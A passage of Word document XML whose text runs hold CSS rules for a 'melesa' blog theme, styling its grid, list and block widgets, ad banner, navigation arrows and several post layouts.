    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget &gt; .grid-3 &gt; .row .row &gt; div{padding:1px 1px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-3 .first .big,.melesa_widget .first, .melesa_widget .pthumb{height:100%;width:100%;display:table;border-radius:7px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-3 .first .big{background-size:cover !important;background-position:center center !important;padding:100px 0px;padding-bottom:0px;display:table;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-3 .first{position:relative}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-3 .wrapper-post{display:table-cell;vertical-align:bottom;padding:30px 20px;padding-bottom:20px;background:rgba(0, 0, 0, 0) linear-gradient(to bottom, transparent 0%, transparent 0%, rgba(0, 0, 0, 0.5) 100%, rgba(0, 0, 0, 0.1) 100%) repeat scroll 0 0;color:#fff;border-radius:7px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-3 .wrapper-post a{color:#fff;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-3 .post-meta{z-index:1;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-3 .post-tags a{text-transform:uppercase;font-family:'Roboto',sans-serif;font-size:10px;font-weight:500;text-transform:uppercase;display:inline-block;margin:0 0 5px 0;padding:3px 7px;line-height:13px;pointer-events:auto;background:$maincolor;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-3 &gt;.row &gt; .col-sm-6:first-child .post-meta h3 a{font-weight:800;font-size:25px;line-height:34px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.melesa_widget .grid-3 &gt;.row &gt; .col-sm-6:nth-child(2) .post-meta h3 a{font-weight:800;font-size:16px;line-height:18px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-3 &gt;.row &gt; .col-sm-6:nth-child(2) &gt; .row:first-child .post-meta h3 a{font-weight:800;font-size:25px;line-height:34px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa_widget .grid-3 &gt;.row &gt; .col-sm-6:nth-child(2) .other-meta{display:none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*Advertisement Banner*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-advert{text-align:center;margin-bottom:30px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-advert{max-width:100%;overflow:hidden;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/*melesa Widgets */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesawids h2,.melesa-title{font-size:18px;font-weight: 600;border-bottom: 2px solid #ecede7;;padding:10px 4px;position:relative;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesawids h2:after,.melesa-title:after{content: "";position: absolute;left: 0px;bottom: -2px;background:$maincolor;width: 80%;display: table;height:2px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.column-center-inner,.column-left-inner,.column-right-inner{padding: 0px !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .melesa-plugin-link{position: absolute;top:0px;right: 10px;line-height: 48px;font-size:12px;text-transform:uppercase;font-weight:500;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .melesa-plugin-link i{font-size:10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesawids h2{padding-right: 80px;margin-top:0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mlsa-arrow.disable{padding: 0px !important;display: inline-block;margin-right: 7px;width: 25px;height: 25px;line-height: 25px;border: 1px solid #dcdcdc;text-align: center;vertical-align: middle;font-size: 7px;color: #dcdcdc;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mlsa-arrow{padding: 0px !important;display: inline-block;margin-right: 7px;width: 25px;height: 25px;line-height: 25px;border: 1px solid #b7b7b7;text-align: center;vertical-align: middle;font-size: 7px;color: #b7b7b7;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mlsa-arrow.disable:hover{background: transparent;border-color: #dcdcdc}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mlsa-arrow:hover{background: $maincolor;border-color:$maincolor;color:#fff}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mlsa-arrow:hover i{color:#fff}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mlsa-arrow.disable:hover i{color:#b7b7b7}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mlsa-arrow{color:#b7b7b7}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mlsa-arrow.disable{color:#dcdcdc}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.melesa-plugin .melesa-loading{position: absolute;z-index: 99;background:rgba(255,255,255,0.8);left:0px;right:0px;top:0px;bottom:0px;text-align:center;display:none;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .melesa-loading .melesa-table{display: table;width: 100%;height: 100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .melesa-loading .melesa-table .melesa-cell{display: table-cell;vertical-align: middle;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .melesa-relative{position: relative}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .melesa-nav{margin-top:20px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mlsa-no-post .mlsa-table{display: table;text-align:center;width:100%;padding:40px;background:rgb(236,239,241)}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mlsa-no-post .mlsa-cell{display: table-cell;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mlsa-no-post img{max-width: 280px;margin-bottom:20px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.mlsa-no-post h3{font-size:18px;font-weight: 400;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* melesa [List Widget] */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .first .img-thumb{position: relative}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .first .img-thumb .tags{position: absolute;bottom: 0;left: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .first .img-thumb .tags a{color: #fff;background: $darkcolor;padding: 2px 5px;display: block;font-size:10px;text-transform: uppercase;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .first .p-title a{font-size:19px;line-height: 21px;font-weight: 600;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .pmeta span a{font-size:11px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .pmeta span{font-size:11px;color: #aaa;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .pmeta span.p-author a{font-weight: 500}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .first .p-desc{font-size: 13px;color: #777;font-family: 'Open Sans',arial,sans-serif;  margin-top: 9px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .second .img-thumb{float: left;width: 100px;height:100px;margin-right: 10px;margin-top:5px;display: table}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .second .img-thumb .ithumb{display: table;height: 100px;width: 100px;background-size:cover !important;background-position:center center !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .second .p-title h3{line-height: 15px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .second .p-title h3 a{font-size:14px;font-weight: 600;line-height: 16px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .second .right-wrap{box-sizing: border-box;padding-left: 0px;display: table;margin-top:-5px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.melesa-plugin .list-widget .second .col-sm-12{position: relative;clear: left;margin-bottom: 5px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .second .pwrap:after{content: "";clear: both;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .mlsa-readmore{clear: left;border:1px solid rgb(220, 220, 220);padding:5px 10px;margin-top:15px;display:table; color:rgb(183,183,183);margin-bottom: 10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .list-widget .mlsa-readmore:hover{border-color:$maincolor;background:$maincolor;color:#fff}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* melesa [Block Widget] */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .first .img-thumb{position: relative}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .first .img-thumb .tags{position: absolute;bottom: 0;left: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .first .img-thumb .tags a{color: #fff;background: $darkcolor;padding: 2px 5px;display: block;font-size:10px;text-transform: uppercase;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .first .p-title a{font-size:19px;line-height: 21px;font-weight: 600;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .pmeta span a{font-size:11px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .pmeta span{font-size:11px;color: #aaa;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .pmeta span.p-author a{font-weight: 500}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .first .p-desc{font-size: 13px;color: #777;font-family: 'Open Sans',arial,sans-serif;  margin-top: 9px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .mlsa-readmore{clear: left;border:1px solid rgb(220, 220, 220);padding:5px 10px;margin-top:15px;display:table; color:rgb(183,183,183);margin-bottom: 10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .mlsa-readmore:hover{border-color:$maincolor;background:$maincolor;color:#fff}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .second .img-thumb{float: left;width: 100px;height:100px;margin-right: 10px;margin-top:5px;display: table}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .second .img-thumb .ithumb{display: table;height: 100px;width: 100px;background-size:cover !important;background-position:center center !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .second .p-title h3{line-height: 15px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .second .p-title h3 a{font-size:14px;font-weight: 600;line-height: 16px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .second .right-wrap{box-sizing: border-box;padding-left: 0px;display: table;margin-top:5px;word-break: break-all;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>.melesa-plugin .block-widget .second .col-sm-12{padding:0px !important;position: relative;clear: left;margin-bottom: 5px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .second .pwrap:after{content: "";clear: both;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .block-widget .second{padding-top:10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* melesa [Grid Widget] */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .grid-widget .first .img-thumb{position: relative}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .grid-widget .first .img-thumb .tags{position: absolute;bottom: 0;left: 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .grid-widget .first .img-thumb .tags a{color: #fff;background: $darkcolor;padding: 2px 5px;display: block;font-size:10px;text-transform: uppercase;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .grid-widget .first .p-title a{font-size:19px;line-height: 21px;font-weight: 600;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .grid-widget .pmeta span a{font-size:11px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .grid-widget .pmeta span{font-size:11px;color: #aaa;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .grid-widget .pmeta span.p-author a{font-weight: 500}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .grid-widget .first .p-desc{font-size: 13px;color: #777;font-family: 'Open Sans',arial,sans-serif;  margin-top: 9px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .grid-widget .mlsa-readmore{clear: left;border:1px solid rgb(220, 220, 220);padding:5px 10px;margin-top:15px;display:table; color:rgb(183,183,183);margin-bottom: 10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .grid-widget .mlsa-readmore:hover{border-color:$maincolor;background:$maincolor;color:#fff}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .grid-widget .second .p-title a{font-size:15px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .grid-widget .second .p-title h3{line-height: 17px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .grid-widget .second .ithumb{display: table;height: 100px;width: 100%;background-size: cover !important;background-position: center center !important;margin-top:10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .grid-widget .second .pmeta{display: none}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>.melesa-plugin .grid-widget .kit-img{display: table;height: 170px;width: 100%;background-size: cover !important;background-position: center center !important;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Post Layout [Default] */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.default article .ithumb{display: table;height: 100%;width: 100%;background-size:cover !important;background-position:center center !important;border-radius:7px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.default article{margin-bottom: 10px;padding:10px 0px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#main.default article .p-title h3{font-size: 23px;line-height: 26px;padding-top: 5px;font-weight: 400;color: #000;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.default article .p-meta span{font-size: 11px;color: #aaa;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.default article .p-snip{font-size: 12px;color: #5b5b60;font-family: 'Montserrat', sans-serif;margin-top: 9px;padding-bottom: 5px;line-height: 15px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.default article .p-redmore{border:1px solid #dcdcdc;padding:5px 10px;display: table;margin-top:9px;margin-bottom: 5px;color:#aaa}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.default article .p-redmore:hover{border-color:$maincolor;background: $maincolor;color: #fff}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Post Layout [Big Post] */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.big-post article{margin-bottom: 10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.big-post article .p-title h3{font-size: 19px;line-height: 21px;font-weight: 600;padding-top:5px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.big-post article .p-meta span{font-size: 11px;color: #aaa;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.big-post article .p-snip{font-size: 13px;color: #777;font-family: 'Open Sans',arial,sans-serif;margin-top: 9px;padding-bottom: 5px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.big-post article .p-redmore{border:1px solid #dcdcdc;padding:5px 10px;display: table;margin-top:9px;margin-bottom: 5px;color:#aaa}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.big-post article .p-redmore:hover{border-color:$maincolor;background: $maincolor;color: #fff}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.big-post article .p-cardpan{margin:0px 30px;margin-top:-80px;background: #fff;z-index: 1;position:relative;box-sizing: border-box;padding: 20px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.big-post article .img_nxt img{width: 100%;min-width:100%;transition:.2s all ease-in-out;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.big-post article .img_nxt{position: relative;display: table;overflow: hidden;width: 100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.big-post article .p-meta{border-bottom: 1px solid #f7f7f7;padding-bottom: 10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>/* Post Layout [Grid Post] */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.grid-post article{margin-bottom: 10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.grid-post article .p-title h3{font-size: 19px;line-height: 21px;font-weight: 600;padding-top:5px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.grid-post article .p-meta span{font-size: 11px;color: #aaa;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.grid-post article .p-snip{font-size: 13px;color: #777;font-family: 'Open Sans',arial,sans-serif;margin-top: 9px;padding-bottom: 5px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>#main.grid-post article .p-redmore{border:1px solid #dcdcdc;padding:5px 10px;display: table;margin-top:9px;margin-bottom: 5px;color:#aaa;position: absolute;bottom:10px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.grid-post article .p-redmore:hover{border-color:$maincolor;background: $maincolor;color: #fff}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.grid-post article .p-cardpan{background: #fff;z-index: 1;box-sizing: border-box;padding: 10px;padding-bottom: 80px;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.grid-post article .img_nxt img{width: 100%;min-width:100%;transition:.2s all ease-in-out;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.grid-post article .img_nxt{position: relative;display: table;overflow: hidden;width: 100%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t>#main.grid-post article:hover .img_nxt img{transform: scale(1.1,1.1);transition:.2s all ease-in-out;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
